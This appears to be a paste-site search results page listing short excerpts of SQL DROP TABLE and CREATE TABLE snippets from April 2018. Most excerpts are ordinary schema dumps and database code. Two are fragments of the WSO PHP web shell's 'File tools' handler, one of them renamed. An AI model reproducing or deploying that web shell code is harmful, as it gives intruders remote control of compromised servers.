42.7K results in 801 ms
8 years ago · Apr 23, 2018, 03:04 PM
for table `t_lang` -- DROP TABLE IF EXISTS `t_lang`; /*!40101 SET @saved_cs_client
8 years ago · Apr 23, 2018, 02:46 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Apr 23, 2018, 02:46 PM
for table `t_lang` -- DROP TABLE IF EXISTS `t_lang`; /*!40101 SET @saved_cs_client
8 years ago · Apr 23, 2018, 02:12 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Apr 23, 2018, 01:52 PM
g_sql_tuple = SQL_MakeStdTuple(); SQL_ThreadQuery(g_sql_tuple, "QueryCreateTable", "CREATE TABLE IF NOT EXISTS `hns_xp` ( `name` VARCHAR(32) NOT
8 years ago · Apr 23, 2018, 12:36 PM
non-validated risk. */ DROP TABLE IF EXISTS postcodes_geo; CREATE TABLE postcodes_geo ( postcode varchar(5) NOT NULL, suburb varchar(100) NOT
8 years ago · Apr 23, 2018, 12:24 PM
USE `TP3` ; -- ----------------------------------------------------- -- Table `TP3`.`tblVille` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `TP3`.`tblVille` ( `idVille` INT NOT
8 years ago · Apr 23, 2018, 12:24 PM
database . '.' . $table_list[$i]); $query .= 'DROP TABLE IF EXISTS `' . $database . '.' . $table_list[$i] . '`;' . lnbr; $query .= lnbr . 'CREATE TABLE `' . $database . '.' . $table_list[$i] . '` (' . lnbr;
8 years ago · Apr 23, 2018, 11:04 AM
EX 13 ------------------------------------------------------------------------------------------------------------------------------------- -- Type and table CREATE OR REPLACE TYPE myarrtype
8 years ago · Apr 23, 2018, 10:56 AM
for table `t_categoriesproject` -- DROP TABLE IF EXISTS `t_categoriesproject`; /*!40101 SET @saved_cs_client
8 years ago · Apr 23, 2018, 10:40 AM
USE `superhero` ; -- ----------------------------------------------------- -- Table `superhero`.`users` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `superhero`.`users` ( `id` INT NOT
8 years ago · Apr 23, 2018, 10:38 AM
sql.TableExists( "playerpdata" ) ) then sql.Query( "CREATE TABLE IF NOT EXISTS playerpdata ( infoid TEXT NOT
8 years ago · Apr 23, 2018, 09:54 AM
EXISTS dependente; DROP TABLE IF EXISTS chaves; CREATE TABLE socio ( codigosocio BIGINT NOT NULL, categoria INT NOT
8 years ago · Apr 23, 2018, 09:46 AM
sql_mode = 'ANSI,NO_BACKSLASH_ESCAPES,NO_DIR_IN_CREATE,NO_ENGINE_SUBSTITUTION,NO_UNSIGNED_SUBTRACTION,TRADITIONAL' ~ (0.000183) DROP TABLE IF EXISTS `events` ~ (0.091431) SHOW TABLES
8 years ago · Apr 23, 2018, 09:38 AM
mdct).plist:7 error: Snippets/Migration Drop Create Table (mdct).plist: patch does not apply error: patch failed:
8 years ago · Apr 23, 2018, 09:14 AM
LOCATION 's3://{BUCKET}/'; """) table = get_results(f""" CREATE EXTERNAL TABLE IF NOT exists users ( id STRING, first_name
8 years ago · Apr 23, 2018, 09:10 AM
n"); $this->stow("#\n"); $this->stow("\n"); $this->stow("DROP TABLE IF EXISTS " . $this->backquote($table) . ";\n"); // //Table structure
8 years ago · Apr 23, 2018, 09:06 AM
members_history.value members:abstract CREATE TABLE IF NOT EXISTS `members:abstract` ( `id` INT UNSIGNED
8 years ago · Apr 23, 2018, 08:18 AM
CREATE TABLE IF NOT EXISTS `survey` ( `surv_id` BIGINT UNSIGNED
Total pages: 2134